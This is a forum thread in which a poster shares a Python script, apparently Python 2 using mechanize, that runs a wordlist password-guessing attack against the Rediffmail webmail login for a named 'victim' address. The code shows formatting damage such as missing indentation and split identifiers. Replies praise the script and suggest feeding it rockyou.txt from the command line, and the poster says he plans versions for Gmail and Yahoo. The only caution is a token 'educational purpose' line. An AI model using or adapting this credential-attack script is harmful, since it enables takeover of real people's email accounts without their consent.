Forum Thread: Python Script to Bruteforce Rediffmail Account.

import mechanize
import cookielib
import sys
email = "victim@rediffmail.com"; #victim email
wordlist = "wordlist.txt"; #wordlist file
url = "https://mail.rediff.com/cgi-bin/login.cgi";
print """
Dark Rediffmail Bruter Script.
Written By : Tanmay Upadhyay India
Email : kevinmetnik606@gmail.com

WARNING Only for educational purpose dont use it for hacking purpose.
\n
"""
def brute():

if(email == ""):
print "\n\tError Sorry we cant able to find email to attack.";
sys.exit(1);
br = mechanize.Browser();
cj = cookielib.CookieJar();
br.setcookiejar(cj);
br.set
handlerobots(False);
br.set
handlerefresh(mechanize.http.HTTPRefreshProcessor(),maxtime = 1);
br.set
handlereferer(True);
f = open(wordlist,'r');
data = f.readlines();
data
len = len(data);
br.open(url);
print "+ Wordlist contain max %s words."%datalen;
print "! Connected to Rediffmail server.";
print "\n\tStarting a wordlist attack.....";
print "\n";
for pas in data:
pas = pas.replace("\n","");
br.select
form(name="loginform");
br.form'login' = email;
br.form'passwd' = pas;
br.submit();
if(br.geturl() == url):
print "error password %s in not correct."%pas;
else:
print "success correct password found.";
print "\n\tEmail => %s \n\tPassword => %s"%(email,pas);
print "\n"
br.close();
sys.exit(1);
try:
brute();
except KeyboardInterrupt:
print "\n\t+ Operation Cancelled by Attacker Ctrl + C Pressed.";
sys.exit(1);
except IOError:
print "\n\tError Unable to locate or open wordlist file.";
print "\n";
sys.exit(1);
except:
pass

just wanted to share,

Thanks

13 Responses

This script is from the facebook account cracker. Atleast, state the help source. Thanks anyway for awesome script.

Will you please provide raw code for this, maybe through pastebin or anything else....

Will you please provide raw code for this, maybe through pastebin or anything else....

Thanks for the share . Can you post it on pastebin or any of the paste sites and link it back here?

This CMS is de-void of code brackets and makes it extremely unfriendly to the coders who want to share anything of a code nature.

Although you could share how to sharpen a knife, use bacon in unholy ways or how to void your phones warranty very easy here.

<!-- kevinmetnik606 of Security is fake a.k.a 13lackD3m0n ? -->

Nice code :)

I have a little suggestion...

The script could take email and wordlist as input after you run the code, so instead of modifying the code each time you run it, you just feed it some parameters.

wordlist = str(raw_input("Enter your wordlist: "))
email = str(raw_input("Enter the email: "))

Or you could make it even better, you enter the parameters prior to running the code, such as:

python rediff.py /usr/share/wordlists/rockyou.txt someone@mail.com

For that, you just have to add this at the beginning:

from sys import argv

script, wordlist, email = argv

ok thanks for suggestion. i'll soon work on it and also try to develop gmail,yahoo and others :)

This is a dictionary attack, not a bruteforce attack. Make sure you use the right terminology.

It only works on Rediff mail or we can use this script somewhere else

Share Your Thoughts

  • Hot
  • Active